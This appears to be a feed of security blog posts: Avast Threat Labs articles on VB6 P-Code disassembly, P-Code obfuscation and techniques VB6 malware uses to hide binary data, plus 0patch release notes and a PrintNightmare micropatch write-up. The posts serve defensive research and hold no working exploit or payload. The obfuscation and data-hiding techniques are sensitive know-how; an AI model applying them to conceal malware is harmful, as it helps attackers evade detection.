For internal types such as user classes, forms and user controls, we also need to understand their VTable layout. For internal types however we do not receive the aid of tlb files. Public methods will have their names embedded in the VB file format structures which can be of help.

Resolution of these types of calls is beyond the scope of what we can cover in an introductory paper, but it is absolutely critical to get right if you are writing a disassembler that people are going to rely upon for business needs.

More on opcode handler inputs

Back to opcode arguments. It is also important to understand that opcodes can take dynamic runtime stack arguments in addition to the hard coded byte stream arguments. This is not something that a disassembler necessarily needs to understand though. This level of knowledge is mainly required to write P-Code assembly or a P-Code decompiler. 

Some special cases however do require the context of the previous disassembly in order to resolve properly. Consider the following multistep operation:

Here the LateIdLdVar resolver needs to know which object is being accessed. Scanning back and locating the VCallAd instruction is required to find the active object stored in PR

Debugging handlers

When trying to figure out complex opcode handlers, it is often helpful to watch the code run live in a debugger. There are numerous techniques available here. Watching the handler itself run requires a native debugger. 

Typically you will figure out how to generate the opcode with some VB6 source which you compile. You then put the executable in the same directory as your reference copy of the vb runtime and start debugging. 

Some handlers are best viewed in a native debugger, however many can be figured out just by watching it run through a P-Code debugger. 

A P-Code debugger simplifies operations showing you its execution at a higher level. In one step of the debugger you can watch multiple stack arguments disappear, and the stack diff light up with changes to other portions. Higher level tools also allow you to view complex data types on the stack as well as examine TLS memory and keep annotated offsets. 

In some scenarios you may actually find yourself running both a P-Code debugger and a native debugger on the target process at the same time. 

One important thing to keep in mind is that VB6 makes heavy use of COM types. 

Going back to our LitVarStr example:

You would see the following after it executes:

0019FC28 ebp-120 0x0019FCB0 ; ebp-98 - top of stack 
... 
0019FCB0 ebp-98 0x00000008 
0019FCB4 ebp-94 0x00000000  
0019FCB8 ebp-90 0x0040122C

A data viewer would reveal the following when decoding ebp-98 as a variant:

Variant 19FCB0 
VT: 0x8( Bstr ) 
Res1: 0 
Res2: 0 
Res3: 0 
Data: 40122C 
String len: 9 -> never hit

Debugging VB6 apps is a whole other ball of wax. I mention it here only in passing to give you a brief introduction to what may be required when deciphering what opcodes are doing. In particular recognizing Variants and SafeArrays in stack data will serve you well when working with VB6 reversing.

Conclusion

In this paper we have laid the necessary ground work in order to understand the basics of a VB6 P-Code disassembly engine. The Semi-VbDecompiler source is a good starting point to understand its inner workings. 

We have briefly discussed how to find and read native opcode handlers along with some of the conventions necessary for understanding them. We introduced you to how opcodes flow from one to the next, along with how to determine the number of byte stream arguments each one takes, and how to figure out what they represent. 

There is still much work to be done in terms of documenting the instruction set. I have started a project where I catalog:

  • VB6 source code required to generate an opcode
  • byte stream arguments size and meaning
  • stack arguments consumed
  • function outputs

Unfortunately it is still vastly incomplete. This level of documentation is foundational and quite necessary for writing any P-Code analysis tools.

Still to be discussed, is how to find the actual P-Code function blobs within the VB6 compiled executable. This is actually a very involved task that requires understanding a series of complex and nested file structures. Again the Semi-VbDecompiler source can guide you through this maze.

While VB6 is an old technology, it is still commonly used for malware. This research is aimed at reducing gaps in understanding around it and is also quite interesting from a language design standpoint. 

[1] – VB6 runtime with symbols
[2] – Semi-VbDecompiler opcode table Source
[3] – A closer look at the VB6 For Loop implementation
[4] – Semi-VBDecompiler opcode argument decodings 
[5] – Introducing a one byte NOP opcode
[6] – Semi-VBDecompiler

The post VB6 P-Code Disassembly appeared first on Avast Threat Labs.

VB6 P-Code Obfuscation

28 April 2021 at 09:37

Code obfuscation is one of the cornerstones of malware. The harder code is to analyze the longer attackers can fly below the radar and hide the full capabilities of their creations.

Code obfuscation techniques are very old and take many many forms from source code modifications, opcode manipulations, packer layers, virtual machines and more.

Obfuscations are common amongst native code, script languages, .NET IL, and Java byte code

As a defender, it’s important to be able to recognize these types of tricks, and have tools that are capable of dealing with them. Understanding the capabilities of the medium is paramount to determine what is junk, what is code, and what may simply be a tool error in data display. 

On the attackers side, in order to develop a code obfuscation there are certain prerequisites required. The attacker needs tooling and documentation that allows them to craft and debug the complex code flow. 

For binary implementations such as native code or IL, this would involve specs of the target file format, documentation on the opcode instruction set, disassemblers, assemblers, and a capable debugger.

One of the code formats that has not seen common obfuscation has been the Visual Basic 6 P-Code byte streams. This is a proprietary opcode set, in a complex file format, with limited tooling available to work with it. 

In the course of exploring this instruction set certain questions arose:

  • Can VB6 P-Code be obsfuscated at the byte stream layer? 
  • Has this occurred in samples in the wild?
  • What would this look like?
  • Do we have tooling capable of handling it?

Background

Before we continue, we will briefly discuss the VB6 P-Code format and the tools available for working with it.

VB6 P-Code is a proprietary, variable length, binary instruction set that is interpreted by the VB6 Virtual Machine (msvbvm60.dll).

In terms of documentation, Microsoft has never published details of the VB6 file format or opcode instruction set. The opcode handler names were gathered by reversers from the debug symbols leaked with only a handful of runtimes. 

At one time there was a reversing community,  vb-decompiler.theautomaters.com, which was dedicated to the VB6 file format and P-Code instruction set. Mirrors of this message board are still available today [1]. 

On the topic of tooling the main disassemblers are p32Disasm, VB-Decompiler, Semi-Vbdecompiler and the WKTVBDE P-Code debugger.

Of these only Semi-Vbdecompiler shows you the full argument byte stream, the rest display only the opcode byte. While several private P-Code debuggers exist, WKTVBDE is the only public tool with debugging capabilities at the P-Code level. 

In terms of opcode meanings. This is still widely undocumented at this point. Beyond intuition from their names you would really have to compile your own programs from source, disassemble them, disassemble the opcode handlers and debug both the native runtime and P-Code to get a firm grasp of whats going on. 

As you can glimpse, there is a great deal of information required to make sense of P-Code disassembly and it is still a pretty dark art for most reversers. 

Do VB6 obfuscators exist?

While doing research for this series of blog posts we started with an initial sample set of 25,000 P-Code binaries which we analyzed using various metrics. 

Common tricks VB6 malware uses to obfuscate their intent include:

  • junk code insertion at source level
  • inclusion of large bodies of open source code to bulk up binary
  • randomized internal object and method names 
    • mostly commonly done at pre-compilation stage
    • some tools work post compilation.
  • all manner of encoded strings and data hiding
  • native code blobs launched with various tricks such as CallWindowProc

To date, we have not yet documented P-Code level manipulations in the wild. 

Due to the complexity of the vector, P-Code obsfuscations could have easily gone undetected to date which made it an interesting area to research. Hunting for samples will continue.

Can VB P-Code even be obfuscated and what would that look like?

In the course of research, this was a natural question to arise.  We also wanted to make sure we had tooling which could handle it. 

Consider the following VB6 source:

The default P-Code compilation is as follows:

 An obsfuscated sample may look like the following:

From the above we see multiple opcode obfuscation tricks commonly seen in native code.

It has been verified that this code runs fine and does not cause any problems with the runtime. This mutated file has been made available on Virustotal in order for vendors to test the capabilities of their tooling [2]. 

To single out some of the tricks:

Jump over junk:

 Jumping into argument bytes:

At runtime what executes is:

Do nothing sequences:

 Invalid sequences which may trigger fatal errors in disassembly tools:

Detection

The easiest markers of P-Code obfuscation are:

  •     jumps into the middle of other instructions
  •     unmatched for/next opcodes counts
  •     invalid/undefined opcodes 
  •     unnatural opcode sequences not produced by the compiler
  •     errors in argument resolution from randomized data 

Some junk sequences such as Not Not can show up normally depending on how a routine was coded.

This level of detection will require a competent, error-free, disassembly engine that is aware of the full structures within the VB6 file format. 

Conclusion

Code obfuscation is a fact of life for malware analysts. The more common and well documented the file format, the more likely that obfuscation tools are wide spread in the wild.

This reasoning is likely why complex formats such as .NET and Java had many public obfuscators early on.

This research proves that VB6 P-Code obfuscation is equally possible and gives us the opportunity to make sure our tools are capable of handling it before being required in a time constrained incident response. 

The techniques explored here also grant us the insight to hunt for advanced threats which may have been already using this technique and had flown under the radar for years.

We encourage researchers to examine the mutated sample [2] and make sure that their frameworks can handle it without error.

References

[1] vb-decompiler.theautomaters.com mirror
http://sandsprite.com/vb-reversing/vb-decompiler/

[2] Mutated P-Code sample SHA256 and VirusTotal link
a109303d938c0dc6caa8cd8202e93dc73a7ca0ea6d4f3143d0e851cd39811261

The post VB6 P-Code Obfuscation appeared first on Avast Threat Labs.

Binary Data Hiding in VB6 Executables

22 April 2021 at 12:47

Overview

This is part one in a series of posts that focus on understanding Visual Basic 6.0 (VB6) code, and the tactics and techniques both malware authors and researchers use around it. 

Abstract 

This document is a running tally covering many of the various ways VB6 malware can embed binary data within an executable. 

There are 4 main categories: 

  • string based encodings 
  • data hidden within the actual opcodes of the program 
  • data hidden within parts of the VB6 file format  
  • data in or around normal PE structures 

Originally I was only going to cover data hidden within the file format itself but for the sake of  documentation I decided it is worth covering them all.  

Data held within the file format is a special case which I find the most interesting. This is because it can be interspersed within a complex set of undocumented structures which would require  advanced knowledge and intricate parsing to detect. In this scenario it would be hard to determine where the data is coming from or to even recognize that these buffers exist.  

Resource Data 

The first technique is the standard built into the language itself, namely loading data from the  resource section. VB6 comes with an add-in that allows users to add a .RES file to the project.  This file gets compiled into the resource section of the executable and allows for binary data to be  easily loaded. 

This is a well known and standard technique. 

Appended Data 

This technique is very old and has been used from all manner of programming language. It will be mentioned again for thoroughness and to link to a public implementation [1] that allows for  simplified use. 

Hex String Buffers 

It is very common for malware to build up a string of hex characters that are later converted back to binary data. Conversion commonly includes various text manipulations such as decryption or  stripping junk character sequences. Extra character sequences are commonly used to prevent  automatic recognition of the data as a hex string by AV.  

In the context of VB6, there are several limitations. The IDE only allows for a total of 1023  characters to be on a single line. VB’s line continuation syntax of &_ is also limited to only 25  lines. For these reasons you will often see large blocks of data embedded in the following format: 

In a compiled binary each string fragment is held as an individual chunk which is easily  identifiable. A faster variant may hold each element in a string array so conglomeration only  occurs once.  

This is a well known and standard technique. It is commonly found in VBA, VB6 and malware  written in many other languages. Line length limitations can not be bypassed through command  line compilation. 

Binary Data Within Images 

There are multiple ways to embed lossless data into image formats. The most common will be to  embed the data directly within the structure of a BITMAP image. Bitmaps can be held directly  within VB6 Image and Picture controls. Data embedded in this manner will be held in the .FRX  form resource file before compilation. Once compiled it will be held in a binary property field for  the target form element. Images created like this can be generated with a special tool, and then  embedded directly into the form using the IDE. 

The following is a public sample[2] of data being extracted from such a bitmap 

Extracted images will display as a series of colored blocks and pixels of various colors. Note that  this is not stenography. 

Many tools understand how to extract embedded images from binary files. Since the image data  still contains the BITMAP header, parsing of the VB6 file format itself is not necessary. This  technique is public and in common use. The data is often decrypted after it is extracted. 

Chr Strings 

Similar to obfuscations found in C malware, strings can be built up at runtime based on individual  byte values. A common example may look like the following: 

At the asm level, this serves to break up each byte value and puts it inline with a bunch of  opcodes preventing automatic detection or display with strings. For native VB6 code it will look  like the following: 

In P-Code it will look like the following: 

This is a well known and standard technique. It is commonly found in VBA as well as VB6  malware. 

Numeric Arrays 

Numeric arrays are a fairly standard technique in malware that are used to break up the binary  data amongst the programs opcodes. This is similar to the Chr technique but can hold data in a  more compact format. The most common data types used for this technique are 4 byte longs, and 8 byte currency types. The main advantage of this technique is that the data can be easily  manipulated with math to decrypt it on the fly. 

Native: 

P-Code: 

Native: 

P-Code: 

This technique is not as popular as the others, but does have a long history of use. I think the first place I saw it was in Flash ActionScript exploits. 

Form Properties 

Forms and embedded GUI elements can contain compiled in data as part of their properties. The  most common attributes used are Form.Caption, Textbox.Text, and any element’s. Tag property. 

Since all of these properties are typically entered via the IDE, they are usually found to contain  ASCII only data that is later decoded to binary. 

Developers can however embed binary data directly into these properties using several  techniques.  

While there is way to hexedit raw data in the .FRX form resource file, this comes with limitations  such as not being able to handle embedded nulls. Another solution is inserting the data post  compilation. With this technique a large buffer is reserved consisting of ASCII text that has start  and end markers. An embedding tool can then be run on the compiled executable to fill in the  buffer with true binary data.  

Using form element properties to house text based data is a common practice and has been seen  in VBA, VB6, and even PDF scripts. Binary data embedded with a post processing step has been observed in the wild. In both P-Code and Native, access to these properties will be through COM object VTable calls.  

From the Semi-VBDecompiler source, each different control type (including ActiveX) has its own  parser for these compiled in property fields. Results will vary based on tool used if they can display the data. Semi-Vbdecompiler has an option to dump property blobs to disk for manual exploration. This may be required to reveal this type of embedded binary data. 

UserControl Properties 

A special case for the above technique occurs with the built in UserControl type. This control is  used for hosting reusable visual elements and in OCX creation. The control has two events which  are passed a PropertyBag object of its internal binary settings. This binary data can be easily set  in the IDE through property pages. This mechanism can be used to store any kind of binary data  including entire file systems. A public example of this technique is available[3]. Embedded data will be held per instance of the UserControl in its properties on the host form. 

Binary Strings 

Compiled VB6 executables store internal strings with a length prefix. Similar to the form properties trick, these entries can be modified post compilation to contain arbitrary binary data. In order to discern these data blobs from other binary data, in depth understanding and complex  parsing of the VB6 file format would have to occur.  

The longest string that can be embedded with this technique is limited by the line length in the  IDE which is 2042 bytes ((1023 bytes – 2 for quotes) *2 for unicode).

VB6 malware can access these strings normally with no special loading procedure. As far as its  concerned the source was simply str = “binary data”

The IDE can handle a number of unicode characters which can be embedded in the source for compilation. Full binary data can be embedded using a post processing technique. 

Error Line Numbers 

VB6 allows for developers to embed line numbers that can be accessed in the event of an error to  help determine its location. This error line number information is stored in a separate table outside of the byte code stream.  

The error line number can be accessed through the Erl() function. VB6 is limited to 0xFFFF line  numbers per function, and line number values must be in the 0-0xFFFF range. Since the size of  the embedded data is limited with this technique, short strings such as passwords and web  addresses are the most likely use.

When the code below is run, it will output the message “secret” 

Advanced knowledge of the VB6 file format would be required in order to discern this data from  other parts of the file. Embedded data is sequential and readable if not encoded in some other  way. 

Function Bodies 

The AddressOf operator allows VB6 easy runtime access to the address of a public function in  a module. It is possible to include a dummy function that is filled with just placeholder instructions to create a blank buffer within the .text section of the executable. This buffer can be easily loaded  into a byte array with a CopyMemory call. A simple post compilation embedding could be used to  fill in the arbitrary data.

For P-Code compiles, AddressOf returns the offset of a loader stub with a structure offset. P-Code compiles would require several extra steps but would still be possible.  

References 

[1] Embedded files appended to executable – theTrik:
https://github.com/thetrik/CEmbeddedFiles 

[2] Embedding binary data in Bitmap images – theTrik: 
http://www.vbforums.com/showthread.php?885395-RESOLVED-Store-binary-data-in UserControl&p=5466661&viewfull=1#post5466661 

[3] UserControl binary data embedding – theTrik:
https://github.com/thetrik/ctlBinData

The post Binary Data Hiding in VB6 Executables appeared first on Avast Threat Labs.

0patch Agent 21.05.05.10500 released

12 July 2021 at 16:20


 

Today we released a new version of 0patch Agent that fixes some issues reported by users or detected internally by our team. We always recommend keeping 0patch Agent updated to the latest version, as we only support the last couple of versions; not updating for a long time could lead to new patches no longer being downloaded and agent not being able to sync to the server properly. 

Enterprise users can update their agents centrally via 0patch Central; if their policies mandate automatic updating for individual groups, agents in such groups will get updated automatically.

Non-enterprise users will have to update 0patch Agents manually by logging in to computers with 0patch Agent and pressing "GET LATEST VERSION" in 0patch Console. We're still offering a free upgrade to Enterprise so any PRO user can request Enterprise features by contacting [email protected].

The latest 0patch Agent is always downloadable from https://dist.0patch.com/download/latestagent.


Release Notes


  • "Hash caching" was introduced to significantly reduce the amount of CPU and disk I/O operations when calculating cryptographic hashes of executable modules as these are loaded in running processes. Before, hash calculation was causing performance problems for some users on Citrix and Terminal Servers.
  • Huge log files are a thing of the past. We have implemented a mechanism to keep log sizes limited, with these limits configurable via registry.
  • 0patch Agent used to have the default Windows API behavior when it comes to using SSL/TLS versions, which was causing problems for users requiring TLS 1.1 or 1.2 on older Windows systems and required manual configuration. The new agent supports TLS 1.1 and 1.2 even on older systems such as Windows 7 or  Server 2008 R2 by default.
  • 0patch Console no longer crashes if launched while another instance of 0patch Console is already running. Now, launching a second 0patch Console puts the already running console in the foreground.
  • 0patch Console's registration form had "SIGN UP FOR A FREE ACCOUNT" and "FORGOT PASSWORD" links swapped. This has been corrected.
  • With 0patch FREE, some notifications occasionally failed to get closed and were left hovering indefinitely, making it impossible for users to reach the screen area behind them. This has been corrected.

 

An enormous THANK YOU to all users who have been reporting technical issues to our support team, some of you investing a lot of time in investigating problems and searching for solutions or workarounds. You helped us make our product better for everyone!

WARNING: We have users reporting that various anti-virus products seem to detect the new agent as malicious and block its installation or execution. Specifically, Kaspersky detects the MSI installer package as malicious (preventing installation and update), while Avast and AVG detect 0patchServicex64.exe as malicious (preventing proper functioning of the agent). We recommend marking these as false positives, restoring quarantined files and making an exception for these files if affected.


 

 

 

My talks @ BlackHat 2021 and DefCon29

3 July 2021 at 20:59
By: pi3

This year I’m going to present some amazing research on:

Both of them are really unusual and interesting topics 😉

If anyone is going to be in Las Vegas during BlackHat and/or DefCon this year and would like to grab a beer, just let me know!

Thanks,
Adam

Free Micropatches for PrintNightmare Vulnerability (CVE-2021-34527)

2 July 2021 at 13:34


by Mitja Kolsek, the 0patch Team


Update 8/11/2021: August 2021 Windows Updates brought a fix for PrintNightmare that has the same default effect as our micropatch, although with a different implementation; therefore our micropatch is no longer free but available with a 0patch PRO license.

Update 7/16/2021: We've ported and issued our PrintNightmare patches for Windows computers that have July 2021 Windows Updates installed (which we do recommend). Our patches prevent exploitation of PrintNightmare even if computer settings render Microsoft's patch ineffective, as described by Will Dormann's diagram. These patches remain free for now.

Update 7/15/2021: July Patch Tuesday patches included the same PrintNightmare fix as the July 6 out-of-band Windows Update, with Microsoft stating that it properly resolves the vulnerability. As this diagram shows, two configuration options that aren't inherently security-related can make the system vulnerable to at least local - but likely also remote - attack, so we're going to port our patches to at least July Windows Updates while we continue to assess the situation. Since July Windows Updates also brought fixes for various other vulnerabilities, we recommend applying them to keep your computers fully up-to-date.

Update 7/7/2021: Microsoft has issued an out-of-band update for the PrintNightmare vulnerability, but the next day this update was found to be ineffective for both local and remote attack vectors. The update does, however, modify localspl.dll on the computer, which means that our existing patches stop getting applied to this module if the update is installed. In other words, if you used 0patch to protect your computers against PrintNightmare, applying the July 6 update from Microsoft makes you vulnerable again. Since we expect Microsoft to issue another modification to localspl.dll next week on Patch Tuesday, we decided not to port our patches to the July 6 version of localspl.dll but rather wait and see what happens next week. Consequently, we recommend NOT INSTALLING the July 6 Windows update if you're using 0patch.

Update 7/5/2021: Security researcher cube0x0 discovered another attack vector for this vulnerability, which significantly expands the set of affected machines. While the original attack vector was Print System Remote Protocol [MS-RPRN], the same attack delivered via Print System Asynchronous Remote Protocol [MS-PAR] does not require Windows server to be a domain controller, or Windows 10 machine to have UAC User Account Control disabled or PointAndPrint NoWarningNoElevationOnInstall enabled. Note that our patches for Servers 2019, 2016, 2012 R2 and 2008 R2 issued on 7/2/2021 are effective against this new attack vector and don't need to be updated.


Introduction

June 2021 Windows Updates brought a fix for a vulnerability CVE-2021-1675 originally titled "Windows Print Spooler Local Code Execution Vulnerability". As usual, Microsoft's advisory provided very little information about the vulnerability, and very few probably noticed that about two weeks later, the advisory was updated to change "Local Code Execution" to "Remote Code Execution".

This CVE ID would probably remain one of the boring ones without a surprise publication of a proof-of-concept for a remote code execution vulnerability called PrintNightmare, indicating that it was  CVE-2021-1675. Security researchers Zhiniang Peng and Xuefeng Li, who published this POC, believed that their vulnerability was already fixed by Microsoft, and saw other researchers slowly leaking details, so they decided to publish their work as well.

It turned out that PrintNightmare was not, in fact, CVE-2021-1675 - and the published details and POC were for a yet unpatched vulnerability that turned out to allow remote code execution on all Windows Servers from version 2019 back to at least version 2008, especially if they were configured as domain controllers.

The security community went scrambling to clear the confusion, identify conditions for exploitability, and find workarounds in absence of an official fix from Microsoft. Meanwhile, PrintNightmare started getting actively exploited, Microsoft has confirmed it to be a separate vulnerability to CVE-2021-1675, assigned it CVE-2021-34527, and recommended that affected users either disable the Print Spooler service or disable inbound remote printing.

In addition to Microsoft's recommendations, workarounds gathered from the community included removing Authenticated Users from the "Pre-Windows 2000 Compatible Access" group, and setting permissions on print spooler folders to prevent the attack.

All these mitigations can have unwanted and unexpected side effects that can break functionalities in production (1, 2, 3), some including those unrelated to printing.


Patching the Nightmare

 

Long story short, our team at 0patch has analyzed the vulnerability and created micropatches for different affected Windows versions, starting with those most critical and most widely used:


  1. Windows Server 2019 (updated with June 2021 Updates)
  2. Windows Server 2016 (updated with June 2021 Updates)
  3. Windows Server 2012 R2 (updated with June 2021 Updates)
  4. Windows Server 2008 R2 (updated with January 2020 Updates, no Extended Security Updates) 
  5. Windows 10 v21H1 (updated with June 2021 Updates)
  6. Windows 10 v20H2 (updated with June 2021 Updates)
  7. Windows 10 v2004 (updated with June 2021 Updates) 
  8. Windows 10 v1909 (updated with June 2021 Updates) 
  9. Windows 10 v1903 (updated with December 2020 Updates - latest before end of support)
  10. Windows 10 v1809 (updated with May 2021 Updates - latest before end of support)
  11. Windows 10 v1803 (updated with May 2021 Updates - latest before end of support)
  12. Windows 10 v1709 (updated with October 2020 Updates - latest before end of support)
  13. Windows 7 (updated with January 2020 Updates, no Extended Security Updates) 

 

[Note: Additional patches will be released as needed based on exploitability on different Windows platforms.]

Our micropatches prevent the APD_INSTALL_WARNED_DRIVER flag in dwFileCopyFlags of function AddPrinterDriverEx from bypassing the object access check, which allowed the attack to succeed. We believe that "install warned drivers" functionality is not a very often used one, and breaking it in exchange for securing Windows machines from trivial remote exploitation is a good trade-off.

Our PrintNightmare patch only contains one single instruction, setting the rbx register to 1 and thus forcing the execution towards the code block that performs said object access check.



MODULE_PATH "..\Affected_Modules\localspl.dll_10.0.19041.1052_64bit_Win10-20H2-u202106\localspl.dll"
PATCH_ID 622
PATCH_FORMAT_VER 2
VULN_ID 7153
PLATFORM win64

patchlet_start
    PATCHLET_ID 1
    PATCHLET_TYPE 2
    PATCHLET_OFFSET 0x8f5da
    N_ORIGINALBYTES 5
    JUMPOVERBYTES 8
    
    code_start
        mov ebx, 1       
    code_end
patchlet_end

   


Or as we see it in IDA Pro (green code block is injected by 0patch, grey is the original code that had to be moved in order to inject a jmp instruction in its place to jump to the patch).



 

See our micropatch in action:



Micropatches for PrintNightmare will be free until Microsoft has issued an official fix. If you want to use them, create a free account at 0patch Central, then install and register 0patch Agent from 0patch.com. Everything else will happen automatically. No computer reboots will be needed.

Compatibility note: Some Windows 10 and Server systems exhibit occasional timeouts in the Software Protection Platform Service (sppsvc.exe) on a system running 0patch Agent. This looks like a bug in Windows Code Integrity mitigation that prevents a 0patch component to be injected in the service (which is okay) but sometimes also does a lot of seemingly meaningless processing that causes process startup to time out. As a result, various licensing-related errors can occur. The issue, should it occur, can be resolved by excluding sppsvc.exe from 0patch injection as described in this article.


Frequently Asked Questions


Q: Which Windows versions are affected by PrintNightmare?

Answer updated 7/15/2021: We believe Will Dormann's PrintNightmare diagram most accurately describes the conditions under which PrintNightmare is exploitable, and this applies to all Windows versions at least back to Windows 7 and Server 2008 R2.

We have previously thought that domain-joined computers were not vulnerable but this was likely because by joining a domain, firewall rules were set up that blocked remote exploitation until one started sharing a folder or a printer.

 

Q: How about Windows systems without June 2021 Windows Updates?

We believe that without June 2021 Windows Updates, all supported Windows systems, i.e., all servers from 2008 R2 up and all workstations from Windows 7 and up, are affected.


Q: What will happen with these micropatches when Microsoft issues their own fix for PrintNightmare?

[Update 7/15/2021: We recommend everyone continues applying regular Windows Updates, including specifically the July Patch Tuesday update.]

First off, we absolutely usually recommend you do install all available security updates from original vendors [Update 7/8/2021: For the first time ever we do NOT recommend installing the July 6 update if you're using 0patch. See the top of the article for more information].When Microsoft fixes PrintNightmare, their update will almost certainly replace localspl.dll, where the vulnerability resides, and where our micropatches are getting applied. Applying the update will therefore modify the cryptographic hash of this file, and 0patch will stop applying our micropatches to it. You won't have to do anything in 0patch (such as disabling a micropatch), this will all happen automatically by 0patch design.

When the official fix is available, our micropatches will stop being free, and will fall under the 0patch PRO license. This means that if you wish to continue using them (and many other micropatches that the PRO license includes), you will have to purchase the appropriate amount of licenses.

[Update 7/8/2021: We do not consider Microsoft's July 6 out-of-band updates to be a proper fix, so we're keeping our PrintNightmare patches free until they issue a correct fix.]


Q: I have installed 0patch but the PrintNightmare patch is not applied. Why?

The Print Spooler service doesn't initially load localspl.dll when you start it, so it's probably not loaded yet. When it's needed (e.g., when installing a new printer, probably also when you print, and certainly if you launch a PrintNightmare proof-of-concept or exploit against it), localspl.dll gets loaded, and patched by 0patch.

To be sure you have the correct version of localspl.dll, launch 0patch Console and open the PATCHES -> RELEVANT PATCHES tab. At least one PrintNightmare patch should be listed there.


Q: We have a lot of affected computers. How can we prepare for the next Windows 0day?

Obviously deploying 0patch in an enterprise production environment on a Friday afternoon is not something most organizations would find optimal. As with any enterprise software, we recommend testing 0patch with your existing software on a group of testing computers before deploying across your network. Please contact [email protected] for setting up a trial, and when the next 0day like this comes out, you'll be ready to just flip a switch in 0patch Central and go home for the weekend.


Credits

We'd like to thank Will Dormann of CERT/CC for behind-the-scenes technical discussion that helped us understand the issue and decide on the best way to patch it.


Please revisit this blog post for updates or follow 0patch on Twitter.

❌